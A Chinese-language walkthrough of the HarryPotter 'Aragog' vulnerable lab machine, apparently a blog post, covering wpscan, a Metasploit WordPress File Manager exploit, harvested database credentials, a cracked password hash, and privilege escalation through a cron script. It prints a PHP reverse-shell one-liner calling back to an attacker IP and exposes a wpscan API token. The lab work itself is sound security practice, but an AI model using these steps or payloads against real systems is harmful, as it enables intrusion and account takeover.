harrypotter1-aragog靶机攻略

harrypotter1

扫描

nmap

指纹

目录

渗透

找到了登录位置

看到wordpress就用wpscan扫一扫

wpscan --url="http://10.4.7.153/blog" -e p --plugins-detection aggressive --api-token=d1fuMZc2tbhJWYk9VfNsl0GZlyYxkfH6bpL0pCKFhok

扫描出有这些file manager漏洞

使用msf搜一下这个漏洞

此处选择使用exploit/multi/http/wp_file_manager_rce

名字完全契合

配置完成后运行获取shell,注意要配置targeturi参数

使用该命令获取回显

/usr/bin/script -qc /bin/bash /dev/null

在hagrid98的家目录下发现疑似密码文件

horcrux_{MTogUmlkRGxFJ3MgRGlBcnkgZEVzdHJvWWVkIEJ5IGhhUnJ5IGluIGNoYU1iRXIgb2YgU2VDcmV0cw==}

解码结果如图

wordpress文件夹在etc下,进去看看发现config配置文件

得到数据库的用户信息

root:mySecr3tPass

登入数据库

mysql -uroot -p

在wordpress数据库的wp-users表中发现用户信息

hagrid98:$P$BYdTic1NGSb8hJbpVEMiJaAiNJDHtc.

hash-identifier识别一下密码类型

拿去md5解密,得到

hagrid98:password123

提权

ssh连接登录成功

在/opt文件夹下发现脚本文件,查看内容,是将下载内容复制到tmp路径下,该脚本可能为一个定时执行的任务

将该脚本文件更改为如图内容

进入/tmp增加一个php文件,将下面反弹命令写入

<?php $sock=fsockopen("10.4.7.138",6789);exec("/bin/sh -i <&3 >&3 2>&3");?>

开启监听端口

等待一会提权成功

获取第二个

相关推荐
youngzhiyong4 分钟前
恋爱通信史之保密性
web安全·网络安全·密码学
YAy171 小时前
Shiro550漏洞分析
java·开发语言·学习·网络安全·安全威胁分析
_西瓜_2 小时前
可通过HTTP获取远端WWW服务信息
网络·网络协议·安全·http
小宇python2 小时前
Web应用安全入门:架构搭建、漏洞分析与HTTP数据包处理
前端·安全·架构
Hacker_Fuchen2 小时前
Redis密码设置与访问限制(网络安全)
redis·web安全·bootstrap
Smile灬凉城6663 小时前
CTF之密码学(键盘加密)
安全·web安全·密码学
网络安全Ash3 小时前
运维之网络安全抓包—— WireShark 和 tcpdump
网络·网络协议·安全·网络安全
爱跨境的笑笑5 小时前
跨境出海安全:如何防止PayPal账户被风控?
安全
爪哇学长6 小时前
Spring框架深度剖析:特性、安全与优化
java·安全·spring
尘佑不尘6 小时前
蓝队基础,了解企业安全管理架构
数据库·笔记·安全·web安全·蓝队